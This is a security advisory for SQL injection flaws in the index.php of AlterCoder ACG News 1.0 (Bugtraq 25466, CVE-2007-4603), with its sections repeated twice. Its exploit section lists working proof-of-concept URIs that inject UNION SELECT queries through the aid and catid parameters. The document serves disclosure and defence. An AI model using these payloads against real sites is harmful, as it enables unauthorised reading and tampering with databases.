ACG News index.php Multiple SQL Injection Vulnerabilities
BID:25466
Info
ACG News index.php Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 25466 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4603 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 28 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | SmOk3 is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
AlterCoder ACG News 1.0 |
| Not Vulnerable: | |
Discussion
ACG News index.php Multiple SQL Injection Vulnerabilities
ACG News is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect ACG News 1.0; other versions may also be vulnerable.
ACG News is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect ACG News 1.0; other versions may also be vulnerable.
Exploit / POC
ACG News index.php Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?menu=showarticle&aid=[SQL INJECTION]
http://www.example.com/index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7
http://www.example.com/index.php?menu=showcat&catid=[SQL INJECTION]
http://www.example.com/index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?menu=showarticle&aid=[SQL INJECTION]
http://www.example.com/index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7
http://www.example.com/index.php?menu=showcat&catid=[SQL INJECTION]
http://www.example.com/index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version
Solution / Fix
ACG News index.php Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ACG News index.php Multiple SQL Injection Vulnerabilities
References:
References:
- ACG News Product Page (AlterCoder)